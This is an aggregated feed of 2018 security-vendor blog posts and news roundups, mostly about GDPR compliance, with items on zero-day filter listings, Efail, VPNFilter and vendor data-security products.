The cutting-edge AI tool is part of a research project hosted at the Law Department of the European University Institute.

How Managed Detection and Response Provides Effective Threat Intelligence

Through managed detection and response, organizations can take advantage of the threat intelligence capabilities of security experts.

Did the results from Claudette’s scan surprise you? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Bloomingdale’s and Claudette appeared first on .

Want to avoid GDPR fines? Adjust your IT procurement methods

Gartner said many organizations are still not compliant with GDPR legislation even though it has been in force since May 2018. This is because they have not properly audited data handling within their supplier relationships. Sourcing and vendor management (SVM) leaders should, therefore, review all IT contracts to minimise potential financial and reputation risks. “SVM leaders are the first line of defense for organizations whose partners and suppliers process the data of EU residents on … More

The post Want to avoid GDPR fines? Adjust your IT procurement methods appeared first on Help Net Security.

Digital transformation – why your whole approach to security has to change

Darron Gibbard, Managing Director EMEA North of Qualys, explains to Information Age why organisations must overhaul their approach to security in order to achieve success in digital transformation. By making security

The post Digital transformation – why your whole approach to security has to change appeared first on The Cyber Security Place.

GDPR, two months later

May 25 was D day, the day that the countdown to GDPR, the new General Data Protection Regulation, came to an end, and the legislation became obligatory across the whole of the European Union. Although companies had two years in which to adapt, in the end, the majority of cases saw a last-minute scramble to implement the new regulation.

Many companies were noticeably nervous and apprehensive, something that is understandable if we consider that the consequences of breaching the GDPR are severe, with fines of 10 million Euros or 2% of annual turnover (Level 1), or 20 million Euros or 4% of annual turnover (Level 2).

But now that the dust has started to settle, what assessment can we make of the situation? Have companies adjusted to the new regulation? Have they solved their doubts? Has corporate cybersecurity been standardized in Europe? Have the privacy policy update emails stopped? Has this whole process finally ended? The fact is there are still things left to do, and, if we analyze the consequences of the GDPR, we can say, broadly speaking, that there have been three different situations.

Request a trial

A rise in complaints in several countries

In the weeks leading up to the deadline for the new data protection regulation, large and small companies turned to all kinds of experts in order to adapt to the legislation. Not all of them, however, have managed to properly adapt. Or that, at least, is what many consumers think.

According to The Guardian, data protection agencies in many countries have reported a sharp rise in the number of complaints for apparent breaches of the GDPR: the UK Information Commissioner’s Office and the French CNIL have both reported that the number of complaints of this type have increased considerably.  France, for example, has seen a 50% increase in complaints.

Google and Facebook under scrutiny

Many of the companies that were most concerned about the arrival of the GDRP were small and medium businesses. Though these companies handle less data, they also have less flexibility in their budgets, meaning that they have fewer resources to be able to adapt to the legislation. However, the reactions that we have seen in the two months since its application have gone in the opposite direction.

In fact, according to the non-profit organization NOYB (None of Your Business) most complaints have been against tech giants such as Google, Facebook, or Twitter. The reason? These large companies, rather than totally changing their data treatment policies and fully adapting them to European legislation, chose to launch a standard message, forcing users to accept their new privacy and cybersecurity policies; if users didn’t accept, their accounts would be blocked.

The other side: those who went too far the other way

Nevertheless, there was also a third case that got a lot of people talking: this is where we saw large companies that, despite the fact that they already complied with the new legislation, decided to send their users an email, asking their permission to receive notifications.

If a user chose not to accept these new policies, or simply didn’t click on the link in the email, the company that sent it would be forced to remove many users from their database – users whose permission, in fact, didn’t need to be asked.

This is what lawyer Samuel Parra believes: “There are companies that, after being incorrectly advised, sent this email asking their users for consent again, when in fact, these users’ data had been obtained legitimately, so new consent wasn’t needed.” Thus, “they now have a problem: they have found that 70 or 80% of users didn’t click on the link in the email, meaning that these companies have to delete their details from their database”, something that has meant that “several companies may have lost a large amount of future revenue, all because of some bad advice”.

Whatever the case, one thing that is true is that all companies that handle data belonging to users in the EU not only have to have their users’ permission, but they also have to establish certain corporate cybersecurity measures, such as protecting their communications (emails are the gateway for threats to your company), or implement an action and information protocol in case of possible cyberattacks.

If you’re worried about your company’s IT security, you’ll be interested to find out more about Panda Adaptive Defense, Panda’s advanced cybersecurity suite that not only acts automatically on the most frequent intrusions, but also has a human team of analysts who are able to prevent, detect and respond to cyberattacks.  What’s more, we’ve incorporated the module Panda Data Control to simplify the task of complying with the GDPR, helping you to have greater visibility and control of all personal data, including unstructured data, and to strengthen your security.

The post GDPR, two months later appeared first on Panda Security Mediacenter.

Zero-Day Coverage Update – Week of July 2, 2018

The General Data Protection Regulation (GDPR) has been up and running for a couple of months now and your organization is compliant. It’s time to take a little break – well, not so fast! Late last week, the State of California passed a new data privacy law called the California Consumer Privacy Act of 2018. Set to go in effect on January 1, 2020, it is being regarded as the strongest digital privacy policy in the United States. While it’s not as comprehensive as GDPR, there is opportunity for additional revisions to the law since it was passed by the legislature just in time to withdraw the proposed law from the November ballot. Had the initiative ended up on the ballot, any amendments to the existing text would be next to impossible. There will be much more discussion on this as the deadline gets closer. In the meantime, you can check to see if your organization is GDPR compliant by visiting

Zero-Day Filters

There are 29 new zero-day filters covering eight vendors in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

ABB (4)

  • 32331: ZDI-CAN-6144: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32332: ZDI-CAN-6143: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32334: ZDI-CAN-6142: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32336: ZDI-CAN-6136: Zero Day Initiative Vulnerability (ABB Panel Builder 800)

Advantech (3)

  • 32353: ZDI-CAN-6300: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32354: ZDI-CAN-6301: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32356: ZDI-CAN-6302: Zero Day Initiative Vulnerability (Advantech WebAccess Node)

Delta (1)

  • 32348: ZDI-CAN-6322: Zero Day Initiative Vulnerability (Delta Industrial Automation PMSoft)

Foxit (4)

  • 32343: ZDI-CAN-6332: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32345: ZDI-CAN-6330: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32346: ZDI-CAN-6329: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32347: ZDI-CAN-6326: Zero Day Initiative Vulnerability (Foxit Reader)

LAquis SCADA (1)

  • 32351: ZDI-CAN-6319: Zero Day Initiative Vulnerability (LAquis SCADA)

Microsoft (2)

  • 32350: ZDI-CAN-6080: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 32352: ZDI-CAN-6081: Zero Day Initiative Vulnerability (Microsoft Windows)

Quest (2)

  • 32342: ZDI-CAN-6075: Zero Day Initiative Vulnerability (Quest KACE Systems Management)
  • 32355: ZDI-CAN-6095: Zero Day Initiative Vulnerability (Quest KACE Systems Management)

WECON (12)

  • 32257: ZDI-CAN-5956: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32319: ZDI-CAN-5924: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32323: ZDI-CAN-5938: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32324: ZDI-CAN-5931: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32325: ZDI-CAN-5929,5930: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32326: ZDI-CAN-5928: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32328: ZDI-CAN-5925,5926: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32329: ZDI-CAN-5927: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32330: ZDI-CAN-6062: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32333: ZDI-CAN-6063,6065: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32335: ZDI-CAN-6064: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32339: ZDI-CAN-6067: Zero Day Initiative Vulnerability (WECON LeviStudioU)

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.

The post Zero-Day Coverage Update – Week of July 2, 2018 appeared first on .

Back to Basics: Let’s Forget About the GDPR… For A Moment

At this point it’s fairly safe to assume that most everyone in the business of “data” has heard of the European Union (EU)-wide General Data Protection Regulation (GDPR) that was signed into law in late April 2016; with the compliance deadline having come into effect on May 25, 2018. Clearly, this new regulation has significant implications for organizations across the globe as it relates to data capture, storage, transfer and use. In previous blogs, whitepapers, and webinars, we outlined various ways by which companies can either “get started” with their GDPR compliance efforts, and also how to “maintain” compliance over the long-term.

With all the focus on GDPR compliance, however, we may have glossed over the importance of executing some key data processes for purposes much broader than GDPR. So, let’s forget about GDPR – only for a moment – and level-set on a few critical steps organizations must take to protect their sensitive data, mitigate the risk of accidental or malicious exposures and the subsequent cost and reputational risk.

A major challenge, and one that goes well beyond privacy compliance

In the rush to meet industry expectations or compliance cut-off dates, organizations may skip some foundational steps critical to ensuring long-term data security and reducing organizational cost and administrative burden. Far too many organizations spend far too much money trying to prevent data breaches by simply throwing the full force of technology at their environments. And, just like the old saying “half the money I spend on advertising is wasted; the trouble is I don’t know which half,” half the money spent on data protection is likely also wasted.

To that end, you can’t protect what you don’t know about. Many organizations labor under a false sense of security with respect to knowing what data they have, and where, and that’s just their production data environments. In many cases, lower level non-production or DevOps environments are similar to “wild west” organizational data stores with multiple copies, users, and risk points, usually with fewer security controls in place. In fact, according to an IDC report titled “Copy Data Management”, 82% of organizations surveyed had more than 10 copies of each database, a number that’s no doubt growing as data capture, storage, and use continues to grow.

Furthermore, organizations can waste a lot of time and money on a multitude of unnecessary technologies and resources aimed at protecting complex yet unclassified data environments. Understanding where all your data is stored, classifying relevant sensitive data to align with security and privacy requirements, and assessing vulnerabilities all play a critical role in priming the organization for long-term data security success; and in supporting process and technology enhancements in a more strategic and cost-effective manner.

This leads me to offer what many believe to the number one data security priority for any organization, regardless of industry compliance requirements. That is, data discovery and classification.

Executing your number one data security priority could also save you millions.

By identifying all databases, including archived, forgotten or rogue databases (yes, these exist!), cataloguing and classifying sensitive data, and assessing databases for vulnerabilities and misconfigurations; your organization is in a much better position to make educated decisions on what investments need to be made, and where, in terms of data security. It also allows you to find weak points in the chain, and make decisions on what data is being captured, why, and where opportunities exist to remove databases/sensitive data, ultimately limiting risk footprint and overall data protection costs.

Too many high profile, high value organizations skip this critical step in the haste to tick the compliance checkbox and are therefore under the false assumption that they are protected against the cost of data breach because they have either (a) purchased and installed various security software and related applications, and/or (b) have grossly inflated their IT budgets with additional internal hires or an army of consultants. They don’t really know what they have, where it is, or why they are protecting it (and at what cost).

This is clearly a risky scenario from a variety of perspectives. So, where do you go from here? Some organizations attempt manual discovery efforts to achieve a greater understanding of their data environments, and while better than nothing, these manual processes are fraught with inefficiencies, risk, and opportunity costs when looking at the resources required.

Leveraging industry-recognized, purpose-built solutions and expertise offer a much more efficient and effective way to conduct data discovery and classification and offers a more scalable and sustainable process over the long-term. Imperva offers a variety of data security solutions and managed services to support organizational data discovery and classification efforts, with the two solutions being Imperva SecureSphere and Imperva Camouflage.

Mapping your data landscape with Imperva Data Security solutions

The Imperva SecureSphere solution offers Discovery and Assessment, which provides an automated and reliable way to locate ALL sensitive data. It easily identifies where databases are on the network, and across complex environments. It also surfaces rogue databases and finds sensitive data pertinent to all major privacy and compliance regulations. In addition, SecureSphere also streamlines vulnerability assessment at the data level. It provides a comprehensive list of over 1500 tests and assessment policies for scanning platform, software, and configuration vulnerabilities.

To make life even easier, SecureSphere produces automated and detailed reports that help provide an understanding of an organization’s overall security posture and risk footprint. In addition to graphical dashboards, it includes pre-defined assessment test reports as well as the ability to create custom reports. Assessment test reports also provide concrete recommendations to mitigate identified vulnerabilities and strengthen the security posture of a data repository. With respect to Imperva Camouflage, it too offers discovery and classification capabilities embedded within this purpose-built data masking solution, and many organizations avail of its discovery and classification capabilities when choosing to de-identify or mask their sensitive data for use in securing DevOps or test and development data use.

Regardless of the solution, it’s clear that using a purpose-built tool, with years of expertise built right-in can provide significant value to an organization when compared to native or manual efforts, and helps ensure a long-term sustainable model for data security.

The ease with which you can achieve critical data security outcomes provides significant value to the organization and a compelling cost/benefit analysis for the ultimate decision makers. These outcomes include:

  • Uncovering new, forgotten or rogue databases
  • Discovering where sensitive data is stored across your database infrastructure
  • Detecting database vulnerabilities based on the latest research from the Imperva Defense Center
  • Automating database discovery, sensitive data classification, and database vulnerability assessment • Audit database configurations and measure compliance with industry standards
  • Streamlining regulatory compliance efforts

Armed with this information an organization can quickly identify the level of security required for each application/database and determine both the appropriate technologies as well as the priority of deployment and investment required.

Ultimately, the organization will be primed to reduce their risk of internal or external data breaches, while at the same time enabling secure data use and copy provisioning. Oh, and let’s not forget the value in supporting compliance with privacy regulations such as HIPAA, FERPA, and GDPR!

Contact us to learn more about Imperva’s data security solutions and managed discovery and classification managed services in detail. Also, feel free to test-drive SCUBA, our free database vulnerability scanner tool, and/or CLASSIFIER, our free data classification tool.

Security newsround: June 2018

We round up reporting and research from across the web about the latest security news and developments. This month: help at hand for GDPR laggards, try and efail, biometrics blues, and calls for a router reboot as VPNFilter strikes.

Good data protection resources (see what we did there?)

Despite a very well flagged two-year countdown towards GDPR, the eleventh-hour scramble suggests many organisations were still unprepared. And let’s not forget that May 25 wasn’t a deadline but the start of an ongoing compliance process. Fortunately, there are some excellent resources to help, and we’ve rounded them up here.

This blog from Ireland’s deputy data protection commissioner debunks the widely – and wrongly – held theory of a bedding-in period before enforcement. The post also clarifies how organisations can mitigate the potential consequences of non-compliance with GDPR. Meanwhile the Irish Data Protection Bill passed a vote in the Dail in time for the regulation. You can read the bill in full, if that’s your thing, by clicking here.

In the UK, the Information Commissioner’s Office has produced in-depth guidance on consent for processing information. Specifically, when to apply consent and when to look for alternatives. (Plug: our COO Valerie Lyons wrote a fine blog on the very same subject here.) Together with the National Cyber Security Centre, the ICO also developed guidance to describe a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

The European Data Protection Board (EDPB), formerly known as the Article 29 Working Party, was quickly into action after 25 May. It published guidelines (PDF) on certification mechanisms under the regulation. This establishes the rules by which certification can take place, as proof of compliance with GDPR.

Finally, for an interesting US perspective on the regulation, here’s AlienVault CISO John McLeod. “Every company should prepare for “Right to be Forgotten” requests, which could present operational and compliance issues,” he said.

Do the hack-a

World Rugby suffered a data breach which saw attackers obtain personal details for thousands of subscribers. The data included the first name, email address and encrypted passwords of thousands of users, including players, coaches and parents worldwide. The Sunday Telegraph broke the story, with an interesting take on the news. The breach may have been a random incident but it’s also possible it was a targeted attack. Potential culprits might be one of the groups that previously leaked information from sporting bodies like WADA and the IAAF. Rugby’s governing body discovered the incident in early May, and took down the affected website to conduct more examinations. World Rugby is based in Dublin, and as a result it informed the Data Protection Commissioner about the breach. How would you handle a breach on that scale? Read our 10 steps to better post-breach incident response.

Efail: an email encryption problem or a vulnerability disclosure problem?

A group of researchers in Germany recently published details of critical flaws in PGP/GPG and S/MIME email encryption. They warned that the vulnerabilities could decrypt previously encrypted emails, including sensitive messages sent in the past. Conforming to the security industry’s love of a catchy name (see also: Heartbleed, Shellshock), the researchers dubbed the flaw Efail.

It was the cue for urgent warnings from among others, to stop using email encryption tools. As the researchers put it: “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” The full technical research paper is here, while there’s a website with a Q&A here.

As the story moved on, it emerged that the problem lay more with how some email clients rendered messages. Motherboard’s snarky but well-informed take quoted Johns Hopkins University cryptography professor Matthew Green. He described the exploit as “an extremely cool attack and kind of a masterpiece in exploiting bad crypto, combined with a whole lot of sloppiness on the part of mail client developers.” ProtonMail, the world’s largest secure email service, was scathing about the news. After performing a deep analysis, it said its own client was not vulnerable, nor was the PGP protocol broken.

So what are the big lessons from this story? Distraction is a risk in security. Some security professionals may have rushed to react to Efail even if they didn’t need to. Curtis Franklin’s summary for Dark Reading observed that many enterprise IT teams have either moved away from PGP and S/MIME, or never used them. Noting the criticism of how the researchers published the vulnerabilities, Brian Honan wrote that ENISA, the European Union Agency for Network and Information Security, published excellent good practice for vulnerability disclosure.

Biometrics blues as police recognition tech loses face

There was bad news for fans of dystopian sci-fi as police facial recognition systems for nabbing bad guys proved unreliable. Big Brother Watch claimed the Metropolitan Police’s automated facial recognition technology misidentified innocent people as wanted criminals more than nine times out of 10. The civil liberties group Big Brother Watch presented a report to the UK parliament about the technology’s shortcomings. Among its findings was the high false positive rate. Police forces have supported facial biometrics as a tool to help them combat crime. Privacy advocates described the technology’s use as “dangerously authoritarian”. As noted on our blog, this isn’t the first time a UK organisation has tried to introduce biometrics.

Router reboot alert

Malware called VPNFilter has infected 500,000 routers worldwide, and the net seems to be widening. Cisco Talos Intelligence researchers first revealed the malware, which hijacked devices in more than 54 countries but primarily in Ukraine. “The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations,” the researchers said. VPNFilter can snoop on traffic, steal website credentials, monitor Modbus SCADA protocols, and has the capacity to damage or brick infected devices.

Sophos has a useful plain English summary of VPNFilter and what it can do. The malware affected products from a wide range of manufacturers, including Linksys, Netgear, Mikrotik, Q-Nap and TP-Link. In a later update, Talos said some products from Asus, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE were also at risk. As the malware’s payload became apparent, the FBI advised router owners to reboot their devices. This story shows that it’s always worth checking your organisation’s current risk with a security assessment.


The post Security newsround: June 2018 appeared first on BH Consulting.

Reaching GDPR: A Partner Approach

As Raj Samani, Chief Scientist and Fellow at McAfee says, “It’s critical that businesses do everything they can to protect one of the world’s most valuable assets: data.” Whether your organization achieved compliance with General Data Protection Regulation (GDPR) by the enforcement date on May 25, or still has a way to go, data will continue to play a large and evolving role in every sector and at every company. Samani explains, “The good news is that businesses are finding that stricter data protection regulations benefit both consumers and their bottom line. However, many have short-term barriers to overcome to become compliant, for example, to reduce the time it takes to report a breach.”

With the high cost to achieve compliance standards and even steeper fines if the rules are not met, complying with GDPR can seem daunting. If your organization is still working on meeting the base level regulation, McAfee and our partners have a wide range of materials to assist, including the National Institute of Standards and Technology (NIST) Cybersecurity Framework and a site with all you need to prepare for GDPR requirements. Additionally, McAfee Skyhigh has a detailed action guide to help organizations interpret the legislation and provide guidance on actions that need to be taken regarding data in the cloud.

McAfee doesn’t work alone in our commitment to GDPR and data security. Thanks to McAfee’s Security Innovation Alliance (SIA), we can quickly and effectively help more customers protect their data. These 125+ SIA vendors are committed to working together with our integrated ecosystem to help businesses reach and maintain GDPR standards.

While reaching compliance is the important first step, going beyond the data security fundamentals will quickly become critical to every organization, from commercial to healthcare. It is important to keep in mind that complying with GDPR does not mean you will not be breached. A genuine culture of privacy needs to be created as a core value within each organization. Consumers are increasingly aware of how companies are keeping their data secure and businesses cannot afford to lose customer confidence in relation to data security. Securing consumer’s personal data in a transparent manner can serve as a differentiating factor for any company.

As cybersecurity professionals, it is up to us at McAfee and our Partners to provide the most pertinent GDPR information to each of our customers and help instill the culture of data privacy. The advent of GDPR is the best opportunity in a generation to bring data security up to every customer’s C-Suite and introduce meaningful and lasting change in data security. Together, we can support our customers to achieve GDPR compliance and beyond!

The post Reaching GDPR: A Partner Approach appeared first on McAfee Blogs.

Cyber Security Roundup for May 2018

I'm sure the release of the GDPR on 25th May hasn't escaped anyone's attention. After years of warnings about the EU parliament's intended tough stance on enforcing the human right to privacy in the digital realm, a real 'game changer' of a global privacy regulation has finally landed, which impacts any organisation which touches EU citizen personal data. 

The GDPR's potential hefty financial penalties for breaching its requirements is firmly on the radar of directors at large enterprises and small businesses alike, hence the massive barrage of emails we have all have received in recent weeks, on changes to company privacy statements and requesting consent, many of which I noted as not being GDPR compliant as obtaining "explicit consent" from the data subject. So there is a long way to go for many organisations before they become truly GDPR compliant state based on what I've seen so far in my mailbox.

Cybercriminals have been quick to take advantage of the GDPR privacy emails deluge, using the subject matter in their phishing attacks to cheat access to accounts and con victims.
On a positive GDPR note, also on 25th May, IBM developerWorks released a three-part guidance series written by myself, aimed at helping Application Developers to develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

Overshadowed by the GDPR coming in force, was the release of new NHS Data Security and Protection Toolkit, aimed at the NHS and their service providers, and the European NIS Directive (for telecom providers) went under the radar, but they are significant to those working in those industries.

Always make sure your Broadband Router\Hub does not permit remote administrative access (over the internet) and is always kept up-to-date with the latest security patches, otherwise, it will be at serious risk of being hacked and remotely controlled by cyber-criminals. As evidenced with month, after a DNS flaw in over 800,000 Draytek Routers has allowed hackers to take them over, malware called VPNFilter has infected 500,000 routers, and serious vulnerabilities has been reported in TP-Link EAP controllers.

IBM made headlines after banning its workers from using USB sticks, which I think is a good and reasonable policy. As quite frankly any modern enterprise, whether large or small, with a decent IT infrastructure and cloud services, staff shouldn't need to use USB devices to move data either internally or externally with third parties, so I see this as a rather smart business and security move to ban all USB devices, as it forces staff to use the more secure and more efficient technology made available.

As my @securityexpert twitter account crossed the 10,000 follower threshold Twitter advised 300 million users to reset their passwords after internal error. Apparently, the passwords for the Twitter accounts were accidentally stored in a database in their "plain text" value instead of using a hashed value for the password, as per best practice. I always strongly recommend Twitter users to take advantage and use the multi-factor authentication system Twitter provides, which reduces the risk of account hacking.

Breaches of note in May included a T-Mobile website bug which exposed personal customer data, Coca-Cola said an insider breached 8,000 accounts, and BMW cars were found to have over a dozen security vulnerabilities.

As always a busy month of new security patch releases, with Microsoft, Adobe, PHP, PGP, Google, Git, and Dell all releasing critical security updates to fix significant security flaws. Click the links for the full details.

Analysis of DDoS Attacks at Cloudflare, has revealed that while organisations in the UK have certainly upped their spending on DDoS mitigation, cyber-criminals are now responding by switching to Layer 7 based DDoS attacks
Some interesting articles about the Welsh Cyber Security Revolution and a review of the NHS a year on from the WannaCry outbreak

Reports of interest this month include the Thales Data Threat Report, which found UK businesses to be the most breached in Europe. The LastPass Psychology of Passwords Report which found 59% of people surveyed used the same passwords across multiple accounts, despite 91% of them knowing that using the same password for multiple accounts is a security risk. The 2017 Cylance Report stated the number of cyber-attacks on industries such as healthcare, manufacturing, professional services, and education rose by about 13.4% between 2016 and 2017.


Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help 
Application Developers develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizen's personal data or allow EU citizens sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk

Part 3  provides practical application development techniques that can alleviate an application's privacy risk.

GDPR Planning and the Cloud

Data protection is on a lot of people’s minds this week. The Facebook testimony in Congress has focused attention on data privacy. Against this backdrop, IT security professionals are focused on two on-going developments: the roll-out next month of new European regulations on data (the General Data Protection Regulation, or GDPR) as well as the continued migrations of data to the public cloud.

GDPR is mostly about giving people back their right over their data by empowering them. Among other rights and duties, it concerns the safe handling of data, the “right to be forgotten” (among other data subject rights) and breach reporting. But apparently it will not slow migration to the cloud.

According to a McAfee report being released today, Navigating a Cloudy Sky, nearly half of companies responding plan to increase or keep stable their investment in the public, private or hybrid cloud, and the GDPR does not appear to be a showstopper for them. Fewer than 10 percent of companies anticipate decreasing their cloud investment because of the GDPR.

Getting Help for GDPR Compliance

What is the practical impact of all this? Say your CISO is in the early stages of setting up a GDPR compliance program. In any enterprise it’s important to understand the areas of risk. The first step in managing risk is taking a deep look at where the risk areas exist.

McAfee will feature a GDPR Demo1 at the RSA conference in San Francisco this week that will help IT pros understand where to start. The demo walks conference attendees through five different GDPR compliance scenarios, at different levels of a fictional company and for different GDPR Articles, so that they can start to get a feel for GDPR procedure and see the tools which will help identify risk areas and demonstrate the capabilities for each.

Remember, with GDPR end-users are now empowered to request data that they are the subject of, and can request it be wiped away. With the latest data loss prevention software, compliance teams will be able to service these requests by exporting reports for given users, and the ability to wipe data on those users. But a lot of companies need to learn the specific procedures on compliance with GDPR rules.

GDPR could be looked at as another regulation to be complied with – but savvy companies can also look at it as a competitive advantage. Customers are increasingly asking for privacy and control. Will your business be there waiting for them?

The cloud, GDPR and customer calls for privacy are three developments that are not going away – the best stance is preparation.

1 McAfee will be in the North Hall, booth #N3801 (the “Data Protection and GDPR” booth) and also in the South Hall at the McAfee Skyhigh booth, # S1301.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post GDPR Planning and the Cloud appeared first on McAfee Blogs.

Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection

When the European Union’s (EU) General Data Protection Regulation (DPR) comes into full force May 25, European citizens will receive greater privacy protection and regulators will have a strengthened authority to take action against businesses that breach the new laws. Fines of up to 4% of annual global revenue or €20 million, whichever is greater, can be levied against any organization that processes personal data of EU residents, regardless of where they are based. Stories with doomsday predictions and generous helpings of fear can be found in many publications.

McAfee recently published an executive summary of our report, Beyond GDPR: Data Residency Insights from Around the World, that focuses on responses from the 200 professionals surveyed in the financial services sector. While there remains work to be done, it’s not all doom and gloom for the financial services industry. More than one quarter (27%) of financial services firms surveyed are already set up to comply with the GDPR requirement for controllers to report a breach to the appropriate authorities within 72 hours of becoming aware of a breach, when compared to just 20 percent of other industries. This is most likely the result of greater preparation, as the financial sector has a higher proportion of firms (28%) that have been working on compliance for three to four years, compared to the global average of just two years.

We believe that the looming threat of GDPR fines is an opportunity to communicate the seriousness of these regulations to your board and executives, and to position the firm as one that cares about personal privacy. And that could help boost the bottom line according to survey respondents – some 80% of financial services respondents believe that organizations that properly apply data protection laws will attract new customers.

Knowing what data is stored where is one of the most important steps of this data protection activity, but here are a few more that we recommend.

Step 1. Know Your Data.

Not only where it is, but what it is, why you are collecting it, and what levels of security and encryption are used to protect it. If you are collecting personal data that is not essential to your service offering, you may want to reconsider what you collect to better manage your risk of exposure, and comply with data-minimization principles.

Step 2. Enforce Encryption.

Effective encryption protects data by making it useless to hackers in the event of a data breach. Use proven encryption technologies, such as Triple Data Encryption Standard (DES), RSA, or Advanced Encryption Standards (AES) to ensure the safe storage of both your employees’ data and customers’ data.

Step 3. Pseudonymize personally identifiable information (PII).

Modifying data prior to processing so that it cannot be tracked back to a specific individual provides another layer of data protection. Pseudonymizing your data allows you to take advantage of Big Data and do larger scale data analysis, and is viewed as an appropriate technical and organizational measure under article 32 of the GDPR.

Step 4. Get Executive Management Involved.

The necessary changes to your data storage, monitoring, management, and security systems can require more human and financial resources than are currently budgeted. The potential of significant fines is an excellent opportunity to get the required support from the highest levels of your organization.

Step 5. Appoint a Project Owner.

Staying compliant with various data protection laws is not something that can be done by an IT staffer in their spare time. Consider appointing a data protection officer or equivalent, to take ownership of both implementation and ongoing management of this project. A data protection officer may be required in any event, depending on the nature of the processing carried out.

Step 6. Review Data Security with Cloud Vendors.

With cloud computing and storage touching most business processes in some fashion, consider conducting an audit of all your vendors’ systems, procedures, and contracts, and the data that they are handling and storing on your behalf. After all, each organization will be held responsible for meeting the GDPR requirements.

Step 7. Foster a Security-Aware Culture.

Human errors are often responsible for data and security breaches. It doesn’t matter that your business follows the strictest security protocol —one error made by one uninformed person could lead to irreparable damages. Consider making sure that all your employees and contractors receive proper and regular training on data security and the handling of customer information.

Step 8. Have a Response Plan.

No system is 100% bulletproof. You need an incident response plan in place to make sure that you can recover as quickly as possible in the event of a data breach. Under GDPR law, you are required as a controller to alert the appropriate authorities within 72 hours of becoming aware of a data breach, and you also need to notify any individuals whose personal data has been compromised.

Step 9.  Go with a Privacy by Design Approach.

The GDPR places a requirement on organizations to take into account data privacy during design stages of all projects.  Companies will want to consider data-protection technologies such as data loss prevention (DLP) and cloud data protection (CASB) from the very beginning of the development. Implement data-protection policies that would help prevent both accidental and malicious data theft by insiders and cybercriminals – doesn’t matter where it resides.

While no one can guarantee that you will not suffer a data loss, following these steps will help you understand where you stand, identify any gaps, and improve your organization’s responsiveness. Loss of customer confidence was the most common concern of financial services organisations (64%), and rapid containment and response is one of the best ways to protect your firm’s valuable reputation. So keep calm, and prepare for GDPR.

Read the full report, Beyond GDPR: Data Residency Insights from Around the World, and learn more about the top data-protection concerns and strategies of more than 800 senior business professionals from eight countries and a range of industries.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection appeared first on McAfee Blogs.

